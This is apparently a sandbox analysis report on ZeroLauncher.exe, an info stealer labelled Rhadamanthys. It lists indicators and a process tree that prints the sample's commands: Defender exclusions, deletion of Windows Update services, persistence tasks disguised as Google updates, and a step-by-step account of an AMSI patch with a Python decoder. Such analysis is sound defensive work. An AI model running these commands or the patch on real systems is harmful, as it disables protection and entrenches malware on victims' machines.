Analysis
max time kernel: 150s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-10-2024 04:59
Static task: static1
Behavioral task: behavioral1
  Sample: ZeroLauncher.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: ZeroLauncher.exe
  Resource: win10v2004-20240802-en
General
Target: ZeroLauncher.exe
Size: 19KB
MD5: 982e4ae4559538cfb529dfaff0507880
SHA1: a3b0e3989d6e40792134286e40448004ebeda077
SHA256: 95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
SHA512: 35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f
SSDEEP: 384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description | pid | Process | procid_target
PID 920 created 3536 | 920 | LicSend.exe | 56
PID 920 created 3536 | 920 | LicSend.exe | 56
PID 920 created 3536 | 920 | LicSend.exe | 56
PID 920 created 3536 | 920 | LicSend.exe | 56
PID 920 created 3536 | 920 | LicSend.exe | 56
PID 4552 created 628 | 4552 | powershell.EXE | 5
Blocklisted process makes network request 1 IoCs
flow | pid | Process
11 | 936 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
4644 | powershell.exe
1576 | powershell.EXE
4552 | powershell.EXE
4340 | powershell.exe
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | LicSend.exe
Sets service image path in registry 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dosvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | WaaSMedicAgent.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\UsoSvc\ImagePath = "C:\\Windows\\system32\\svchost.exe -k netsvcs -p" | WaaSMedicAgent.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | LicCheck.exe
Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | ZeroLauncher.exe
Executes dropped EXE 4 IoCs
pid | Process
1720 | LicenseGet.exe
1888 | LicCheck.exe
920 | LicSend.exe
780 | svcupdater.exe
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
9 | bitbucket.org
11 | bitbucket.org
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
4828 | powercfg.exe
1776 | powercfg.exe
3744 | powercfg.exe
1732 | cmd.exe
2800 | powercfg.exe
Drops file in System32 directory 15 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | svchost.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\svcupdater | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 920 set thread context of 3304 | 920 | LicSend.exe | 115
PID 4552 set thread context of 1432 | 4552 | powershell.EXE | 120
Drops file in Program Files directory 1 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | LicSend.exe
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | svchost.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
236 | sc.exe
3672 | sc.exe
2588 | sc.exe
4176 | sc.exe
1004 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svcupdater.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | LicCheck.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | LicenseGet.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.EXE
Modifies data under HKEY_USERS 64 IoCs
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4568 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
1352 | Conhost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2488 wrote to memory of 936 | 2488 | ZeroLauncher.exe | 83
PID 2488 wrote to memory of 936 | 2488 | ZeroLauncher.exe | 83
PID 936 wrote to memory of 4528 | 936 | powershell.exe | 85
PID 936 wrote to memory of 4528 | 936 | powershell.exe | 85
PID 936 wrote to memory of 1720 | 936 | powershell.exe | 87
PID 936 wrote to memory of 1720 | 936 | powershell.exe | 87
PID 936 wrote to memory of 1720 | 936 | powershell.exe | 87
PID 936 wrote to memory of 1888 | 936 | powershell.exe | 88
PID 936 wrote to memory of 1888 | 936 | powershell.exe | 88
PID 936 wrote to memory of 1888 | 936 | powershell.exe | 88
PID 936 wrote to memory of 920 | 936 | powershell.exe | 89
PID 936 wrote to memory of 920 | 936 | powershell.exe | 89
PID 3172 wrote to memory of 236 | 3172 | cmd.exe | 101
PID 3172 wrote to memory of 236 | 3172 | cmd.exe | 101
PID 1732 wrote to memory of 2800 | 1732 | cmd.exe | 102
PID 1732 wrote to memory of 2800 | 1732 | cmd.exe | 102
PID 3172 wrote to memory of 3672 | 3172 | cmd.exe | 103
PID 3172 wrote to memory of 3672 | 3172 | cmd.exe | 103
PID 3172 wrote to memory of 2588 | 3172 | cmd.exe | 104
PID 3172 wrote to memory of 2588 | 3172 | cmd.exe | 104
PID 1732 wrote to memory of 4828 | 1732 | cmd.exe | 105
PID 1732 wrote to memory of 4828 | 1732 | cmd.exe | 105
PID 3172 wrote to memory of 4176 | 3172 | cmd.exe | 106
PID 3172 wrote to memory of 4176 | 3172 | cmd.exe | 106
PID 3172 wrote to memory of 1004 | 3172 | cmd.exe | 107
PID 3172 wrote to memory of 1004 | 3172 | cmd.exe | 107
PID 1732 wrote to memory of 1776 | 1732 | cmd.exe | 108
PID 1732 wrote to memory of 1776 | 1732 | cmd.exe | 108
PID 3172 wrote to memory of 4772 | 3172 | cmd.exe | 109
PID 3172 wrote to memory of 4772 | 3172 | cmd.exe | 109
PID 3172 wrote to memory of 3100 | 3172 | cmd.exe | 110
PID 3172 wrote to memory of 3100 | 3172 | cmd.exe | 110
PID 1732 wrote to memory of 3744 | 1732 | cmd.exe | 111
PID 1732 wrote to memory of 3744 | 1732 | cmd.exe | 111
PID 3172 wrote to memory of 2180 | 3172 | cmd.exe | 112
PID 3172 wrote to memory of 2180 | 3172 | cmd.exe | 112
PID 3172 wrote to memory of 4768 | 3172 | cmd.exe | 113
PID 3172 wrote to memory of 4768 | 3172 | cmd.exe | 113
PID 3172 wrote to memory of 4216 | 3172 | cmd.exe | 114
PID 3172 wrote to memory of 4216 | 3172 | cmd.exe | 114
PID 920 wrote to memory of 3304 | 920 | LicSend.exe | 115
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 4552 wrote to memory of 1432 | 4552 | powershell.EXE | 120
PID 1432 wrote to memory of 628 | 1432 | dllhost.exe | 5
PID 1432 wrote to memory of 680 | 1432 | dllhost.exe | 7
PID 1432 wrote to memory of 976 | 1432 | dllhost.exe | 12
PID 1432 wrote to memory of 424 | 1432 | dllhost.exe | 13
PID 1432 wrote to memory of 756 | 1432 | dllhost.exe | 14
PID 1432 wrote to memory of 1036 | 1432 | dllhost.exe | 16
PID 1432 wrote to memory of 1104 | 1432 | dllhost.exe | 17
PID 1432 wrote to memory of 1112 | 1432 | dllhost.exe | 18
PID 1432 wrote to memory of 1120 | 1432 | dllhost.exe | 19
PID 1432 wrote to memory of 1192 | 1432 | dllhost.exe | 20
PID 1432 wrote to memory of 1248 | 1432 | dllhost.exe | 21
PID 1432 wrote to memory of 1320 | 1432 | dllhost.exe | 22
PID 1432 wrote to memory of 1332 | 1432 | dllhost.exe | 23
PID 1432 wrote to memory of 1448 | 1432 | dllhost.exe | 24
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
  PID: 628
  C:\Windows\system32\dwm.exe
    command line: "dwm.exe"
    PID: 424
  C:\Windows\System32\dllhost.exe
    command line: C:\Windows\System32\dllhost.exe /Processid:{a4f67632-a895-4853-926b-1866b67e8e8a}
    signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 1432
C:\Windows\system32\lsass.exe
  command line: C:\Windows\system32\lsass.exe
  PID: 680
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
  PID: 976
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 756
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
  PID: 1036
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
  PID: 1104
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
  PID: 1112
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  signatures:
  - Drops file in System32 directory
  PID: 1120
  C:\Windows\system32\taskhostw.exe
    command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    PID: 2752
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    command line: [obfuscated PowerShell command line omitted]
    signatures:
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID: 1576
    C:\Windows\System32\Conhost.exe
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 4840
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    command line: [obfuscated PowerShell command line omitted]
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 4552
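The PowerShell command above builds every string out of 'literal'+[Char](n) pieces so that no name such as amsi.dll or AmsiScanBuffer appears in the command line. The Python helper below is an added analyst aid, not sandbox output and not code from the sample; its inputs are fragments copied from the command above, so the decoded names are exactly what the script constructs. Read with it, the script defines a delegate type through Reflection.Emit, resolves GetModuleHandle, LoadLibraryA and VirtualProtect, loads amsi.dll, takes the address of AmsiScanBuffer, makes 8 bytes at that address writable (VirtualProtect flag 4, PAGE_READWRITE), copies the six bytes b8 57 00 07 80 c3 over the function start, sets the page back to 0x20 (PAGE_EXECUTE_READ), then loads a .NET assembly stored in the HKLM\SOFTWARE value dialerstager and invokes its entry point. The six bytes are mov eax, 0x80070057; ret, so every AMSI scan requested from that process returns E_INVALIDARG and the caller never receives a detection result. One caveat specific to this command: the type and method names it builds resolve to Microsoft.Win32.UnsafeLVDVdnBdsrBBl and dLleYeKkjQudRf, which are the script's own variable names rather than the UnsafeNativeMethods / GetProcAddress pair this reflection pattern otherwise uses, so take decoder output literally instead of assuming the usual names.

```python
import re
import struct

# Fragments copied from the obfuscated command line above; they are the test inputs
# for this helper, which is an added analyst aid and not part of the sandbox output.
SAMPLE_FRAGMENTS = {
    "assembly_name": "'Ref'+[Char](108)+'ec'+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+''",
    "dll_loaded": "''+'a'+''+'m'+''+[Char](115)+'i'+'.'+''+[Char](100)+''+'l'+''+'l'+''",
    "export_patched": "''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+''",
    "resolver_method": "''+[Char](100)+'L'+[Char](108)+''+[Char](101)+''+[Char](89)+''+[Char](101)+''+[Char](75)+''+[Char](107)+''+[Char](106)+''+[Char](81)+'u'+[Char](100)+''+'R'+'f'",
    "registry_value": "'d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+'r'",
}

# One complete statement from the same command line, for whole-script scanning.
SAMPLE_SNIPPET = (
    "$keXcFZEZYgB=$LVDVdnBdsrBBl.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+'od'+'u'+'le'"
    "+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''"
    "+[Char](107)+'e'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));"
)

# The six bytes the script copies over the start of AmsiScanBuffer.
PATCH = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3])
HRESULT_NAMES = {0x80070057: "E_INVALIDARG"}

# One piece: a single-quoted literal ('' inside it is an escaped quote) or [Char](n).
PIECE = r"'(?:[^']|'')*'|\[Char\]\(\d+\)"
TOKEN = re.compile(r"'((?:[^']|'')*)'|\[Char\]\((\d+)\)")
# A maximal run of pieces joined by '+', which is how every string in the script is built.
RUN = re.compile(rf"(?:{PIECE})(?:\+(?:{PIECE}))*")


def decode_concat(expr: str) -> str:
    """Evaluate one 'lit'+[Char](n)+'' run to the string PowerShell would build from it."""
    out = []
    for lit, code in TOKEN.findall(expr):
        out.append(chr(int(code)) if code else lit.replace("''", "'"))
    return "".join(out)


def extract_strings(script: str) -> list[str]:
    """Decode every concatenation run in a script, in order, dropping empty results."""
    decoded = (decode_concat(m.group(0)) for m in RUN.finditer(script))
    return [s for s in decoded if s]


def explain_patch(stub: bytes) -> dict:
    """Decode a 'mov eax, imm32; ret' stub: the value the patched export will always return."""
    if len(stub) != 6 or stub[0] != 0xB8 or stub[5] != 0xC3:
        raise ValueError("not a mov eax, imm32 / ret stub")
    hresult = struct.unpack("<I", stub[1:5])[0]  # imm32 is little-endian
    return {
        "mnemonic": f"mov eax, 0x{hresult:08X}; ret",
        "hresult": hresult,
        "name": HRESULT_NAMES.get(hresult, "unknown"),
    }


if __name__ == "__main__":
    for label, fragment in SAMPLE_FRAGMENTS.items():
        print(f"{label:16} {decode_concat(fragment)}")
    print("snippet strings:", extract_strings(SAMPLE_SNIPPET))
    print("patch:", explain_patch(PATCH))
```

Running extract_strings over the whole command line, rather than over the single statement embedded here, gives the full list of names in the order the script uses them; the run regex deliberately treats the `+` chain as one unit so that a name split into twenty pieces comes back as one string.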
  [level 2] C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID: 780
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  PID: 1192
[level 1] C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc  PID: 1248
[level 1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Indicator Removal: Clear Windows Event Logs
  PID: 1320
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  PID: 1332
  [level 2] sihost.exe  (image: C:\Windows\system32\sihost.exe)  PID: 2596
[level 1] C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  PID: 1448
[level 1] C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  PID: 1504
[level 1] C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  PID: 1512
[level 1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  PID: 1560
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  PID: 1636
[level 1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  PID: 1668
[level 1] C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc  PID: 1688
[level 1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  PID: 1768
[level 1] C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm  PID: 1792
[level 1] C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache  PID: 1864
[level 1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  PID: 1872
[level 1] C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  PID: 1936
[level 1] C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository  PID: 1968
[level 1] C:\Windows\System32\spoolsv.exe  PID: 1044
[level 1] C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  PID: 2064
[level 1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc  PID: 2228
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  PID: 2340
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  PID: 2444
[level 1] C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  PID: 2452
[level 1] C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  PID: 2612
[level 1] C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID: 2736
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker  PID: 2780
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  PID: 2828
[level 1] C:\Windows\sysmon.exe  PID: 2852
[level 1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  PID: 2872
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  PID: 2900
[level 1] C:\Windows\system32\wbem\unsecapp.exe -Embedding  PID: 3140
[level 1] C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  PID: 3472
[level 1] C:\Windows\Explorer.EXE  PID: 3536
  [level 2] "C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2488
    [level 3] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 936
      [level 4] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4528
      [level 4] "C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        PID: 1720
      [level 4] "C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        PID: 1888
        [level 5] "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f  (image: C:\Windows\SysWOW64\schtasks.exe)
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
          PID: 4568
          [level 6] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  (image: C:\Windows\System32\Conhost.exe)
            - Suspicious use of SetWindowsHookEx
            PID: 1352
      [level 4] "C:\Users\Admin\AppData\Local\Temp\LicSend.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 920
  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4644
  [level 2] C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - Suspicious use of WriteProcessMemory
    PID: 3172
    [level 3] sc stop UsoSvc  (image: C:\Windows\System32\sc.exe)
      - Launches sc.exe
      PID: 236
    [level 3] sc stop WaaSMedicSvc  (image: C:\Windows\System32\sc.exe)
      - Launches sc.exe
      PID: 3672
    [level 3] sc stop wuauserv  (image: C:\Windows\System32\sc.exe)
      - Launches sc.exe
      PID: 2588
    [level 3] sc stop bits  (image: C:\Windows\System32\sc.exe)
      - Launches sc.exe
      PID: 4176
    [level 3] sc stop dosvc  (image: C:\Windows\System32\sc.exe)
      - Launches sc.exe
      PID: 1004
    [level 3] reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f  (image: C:\Windows\System32\reg.exe)  PID: 4772
    [level 3] reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f  (image: C:\Windows\System32\reg.exe)  PID: 3100
    [level 3] reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f  (image: C:\Windows\System32\reg.exe)
      - Modifies security service
      PID: 2180
    [level 3] reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f  (image: C:\Windows\System32\reg.exe)  PID: 4768
    [level 3] reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f  (image: C:\Windows\System32\reg.exe)  PID: 4216
  [level 2] C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Power Settings
    - Suspicious use of WriteProcessMemory
    PID: 1732
    [level 3] powercfg /x -hibernate-timeout-ac 0  (image: C:\Windows\System32\powercfg.exe)
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 2800
    [level 3] powercfg /x -hibernate-timeout-dc 0  (image: C:\Windows\System32\powercfg.exe)
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 4828
    [level 3] powercfg /x -standby-timeout-ac 0  (image: C:\Windows\System32\powercfg.exe)
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 1776
    [level 3] powercfg /x -standby-timeout-dc 0  (image: C:\Windows\System32\powercfg.exe)
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 3744
  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
